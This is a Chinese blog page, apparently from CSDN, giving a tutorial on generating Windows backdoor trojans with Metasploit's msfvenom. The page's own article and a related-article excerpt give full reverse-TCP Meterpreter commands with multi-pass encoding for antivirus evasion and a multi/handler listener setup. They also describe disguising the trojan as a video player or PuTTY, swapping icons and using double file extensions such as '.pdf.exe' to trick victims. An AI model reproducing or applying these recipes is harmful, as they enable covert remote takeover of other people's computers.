使用metasploit的msfvenom模块生成恶意软件获取后门

最新推荐文章于 2024-12-16 21:07:53 发布
原创 最新推荐文章于 2024-12-16 21:07:53 发布 · 2.1k 阅读 · 49 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

一、背景

msfvenom是msfpayload、msfcencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

二、各类实战

1.生成西瓜影音、看片神器后门木马

打开kali终端,msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp  LHOST=192.168.47.165 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/xigua1.exe

-a x86        架构为32位,兼容64位       

--platform        指定平台windows       

-p指定payload        指定LHOST,LPORT为本机IP、端口       

-b设定规避字符集(会影响payload质量)        "\x00"16进制的空字符       

-e指定需要使用的encoder(编码器)编码免杀       

 -i指定payload的编码次数,编码次数越多,免杀能力越强       

-f指定输出格式生成exe文件    &

最低0.47元/天 解锁文章
Time_worm
关注
利用metasploit生成免杀后门
mirror97black的博客
01-26 5840
免杀 之前的博客中,有利用msf生成代码,目标机执行然后获得shell。但是现在有很多杀软,对各种木马有检测机制,执行危险代码或者运行危险程序,杀软会进行阻止。 免杀有很多种方式,今天介绍一种利用msf生成shellcode免杀,编译为exe文件,这种免杀能够绕过大部分杀软 静态免杀 静态免杀是能够绕过杀软检测,运行时也不会报毒。但是执行危险命令就会报毒,比如说新建用户、进程注入等。 使
网络安全】MSF常用的渗透技巧总结
Yb528970805的博客
09-27 1528
在渗透测试过程中,经常拿到web主机与数据库不同在一个网段,可以得出这台主机还连着一个内网,如果想要继续渗透内网,可以把这台web主机当作跳板机,对内网进行渗透。二、建立一条隧道连接至跳板机,将目标为私有地址的数据发发送至跳板机,目标为私有地址的数据包发送至公网地址会被哦公网路由抛弃,无法访问到目标。在 kaili 中配置隧道要使用的端口,现在版本的 msf 默认是用 socket5 协议,所以在 kali 中也使用 socket5,一、在跳板机上写路由,实现对其他网段的数据包进行转发。
6-24漏洞利用-vnc密码破解
山兔的博客
08-01 5685
VNC(VirtualNetworkConsole)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。主要是用来可视化控制,类似于远程桌面,我们之前接触的ssh、rlogin都是命令行的控制终端,但是VNC跟远程桌面,又有一点不同,远程桌面,开放的是3389,而VNC服务端默认运行在5900端口5900端口,开放的一般是VNC服务端。...
Metasploit 生成各种后门
LYSHARK
01-13 1万+
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,同时该工具也是渗透测试环境中的利器,它支持多平台Payload的生成具有完全的跨平台性,本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.
使用metasploit制做基础的后门程序
梦想闹钟
05-23 403
这里使用metasploit自带的payload生成后门exe文件,LHOST指定连接的地址,LPORT字面意思指定连接的端口,靶机在点击后,就会自己去连接攻击机的端口 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.131 LPORT=6060 -f exe > myvirus.exe 之后上传到windows xp的靶机里并点击运行,需要先确保靶机和攻击机能ping通 之后在攻击机再次加载对应的payload并进行监
使用msfvenom生成被控端并进行远程控制
Z_3679的博客
07-01 665
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和端口使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和端口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门
通过msfvenom生成Metasploit模块:扩展攻击能力
msfvenomMetasploit框架中的一个重要工具,用于生成各种类型的payload,包括恶意软件后门、木马等,以供渗透测试和攻击使用。 #### 1.2 msfvenom的作用 msfvenom的主要作用是生成定制化的Metasploit payload,...
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2975
通过制作含病毒和木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
渗透利器-kali工具 (第五章-6) Metasploit后门生成模块
ztc131450的博客
12-16 808
后门生成模块到权限维持:免杀技术发展史:理论上讲,免杀一定是出现在杀毒软件之后的。通过杀毒软件的发展史不难使用,第一款杀毒软件kill 1.0 是Winsh公司1987年推出的。也就是说免杀技术至少在1989年以后才发展起来。[国外无从拷问,国内非常晚]1989年:第一款杀毒软件Mcafee诞生,标志着反病毒反差杀时代的到来1997年:国内出现了第一个可以自动变异的千面人病毒,自动变异就是病毒针对杀毒软件的免杀方法之一,但是与免杀手法的定义有出入。
Metasploit应用笔记-msfvenom生成meterpreter后门代码
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
Kali Linux渗透测试之Msfvenom木马生成与攻防实战
02-25
一、课程概要       本课程主要分享Kali Linux渗透测试之Msfvenom木马生成与攻防实战技巧!二、适合人员      1、零基础大学生      2、IT技术人员      3、服务器运维工程师      4、渗透测试工程师三、特别说明       1、本课程支持一次购买,享受永久观看!       2、本课程支持一次购买,享受永久更新!       3、本课程系讲师原创课程,如有盗用,欢迎举报!
MSF扫描开放的VNC空口令(虚拟网络计算机)
Ethan024的博客
06-24 1342
VNC用于解决某些问题,但是使用完后,管理员却忘了将其删除,从而留下了未打补丁的VNC。 载入MSF中的vnc模块,并查看选项: msf6 > use auxiliary/scanner/vnc/vnc_none_auth msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options 设置扫描地址段和线程数: msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 192.1
msfVNC身份识别
fake_hydra的博客
07-29 1735
use auxiliary/scanner/vnc/vnc_none_auth msf auxiliary(vnc_none_auth) > show options Module options (auxiliary/scanner/vnc/vnc_none_auth): Name Current Setting Required Descr
附录一.msf常见案例
potato123232的博客
08-04 474
成功之后你就会获得用户名与密码(我用马赛克挡上了),获得了ssh我们就可以随便操作该机器的文件了,你可以使用putty。虽然PASS_FILE与USER_FILE显示的都不是必选参数,但是如果你不写就会报错,我动的是下面这三个参数。他们彼此可以ping通,从虚拟机ping到0网段的其他机器也可以ping通,但是到使用一些东西的时候就不行了。我把用户名与密码都放在两个文本文件的第一位了,我们直接看成功了之后我们可以怎么做。我们发现我们什么都没用扫描出来,但我们并非什么都没做,我们看一下服务端的日志。
Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面
m0_46161993的博客
07-01 6642
问题描述   分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。   由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。 解决办法 在msfconsole中使用命令: use exploit/windows/smb/ms08_06
MSF给正常程序添加后门
永远是少年
06-10 1801
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
网络安全: Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 1977
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
菜鸟腾飞MSF
imtech的博客
01-16 939
菜鸟腾飞Metasploit Framework 渗透测试介绍
1.1 Metasploit 工具简介
热门推荐
LYSHARK
06-30 1万+
Metasploit 简称(MSF)是一款流行的开源渗透测试框架,由`Rapid7`公司开发,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和`Payload`工具,可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台,包括`Windows、Linux、MacOS`等。直到今天`Metasploit`已成为众多黑客手中渗透攻击的利器,并在安全领域大展身手。
msfvenom后门木马伪装
最新发布
12-29
### 使用 `msfvenom` 创建后门木马并进行文件伪装 #### 生成带有 Payload 的可执行文件 为了创建一个能够绕过基本检测机制的后门木马,可以使用 Metasploit Framework 中的工具 `msfvenom` 来生成恶意软件。通过指定不同的参数选项来定制化输出格式以及设置有效载荷(Payload),从而实现特定功能。 对于Windows环境下的攻击向量而言,通常会选择反向TCP连接类型的 Meterpreter shell作为 payload 。下面是一个具体的命令实例用于生成EXE格式的木马程序: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=55555 -e x86/shikata_ga_nai -i 3 -f exe -o /tmp/putty_evil.exe ``` 此命令中的各个部分含义如下: - `-p windows/meterpreter/reverse_tcp`: 设置payload为 Windows 反向 TCP Meterpreter Shell。 - `LHOST=10.0.0.128`: 攻击者的IP地址。 - `LPORT=55555`: 设定本地监听端口号以便接收来自受害主机发起的连接请求。 - `-e x86/shikata_ga_nai`: 对payload应用编码器以增加免杀几率;这里选择了 Shikata Ga Nai 编码方式。 - `-i 3`: 表示迭代次数即重复编码三次增强混淆效果。 - `-f exe`: 输出文件格式设为exe形式。 - `-o /tmp/putty_evil.exe`: 将最终生成的结果保存到 `/tmp/putty_evil.exe` 路径下[^1]。 #### 实现文件伪装技术 为了让受害者更易受骗运行该恶意程序,可以通过修改图标外观使其看起来像是合法应用程序的方式来进行简单有效的社会工程学欺骗。例如,在上述案例中提到的方法就是把正常使用的 PuTTY SSH 客户端替换成了含有恶意代码版本但仍保留原有界面特征[^2]。 具体操作可通过图形编辑工具更改 PE (Portable Executable) 文件资源节内的图像数据完成这一过程。然而更为简便的做法是在生成过程中直接调用其他无害但具有迷惑性的二进制文件模板,比如官方发布的实用工具副本等。 另外一种常见的做法是利用双扩展名技巧——将实际病毒体命名为看似文档或其他常见类型结尾的名字,如 `.pdf.exe` 或者`.jpg.vbs` ,以此诱导用户误以为只是查看某个附件而实际上却启动了隐藏其中的危险组件[^3]。 #### 配置监听服务等待回调 一旦成功部署好客户端侧的植入物之后,则需回到 Kali Linux 终端准备接受远程指令传递过来的信息流。这一步骤涉及到了Metasploit Console (`msfconsole`) 的运用,它允许安全研究人员快速搭建起相应的处理模块并对预期到来的目标会话实施接管控制。 以下是配置多处理器句柄监听的具体步骤说明: ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.0.0.128 set lport 55555 run ``` 这些设定确保当被感染设备尝试建立回连时能立即捕获其产生的流量进而获取完整的交互权限[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值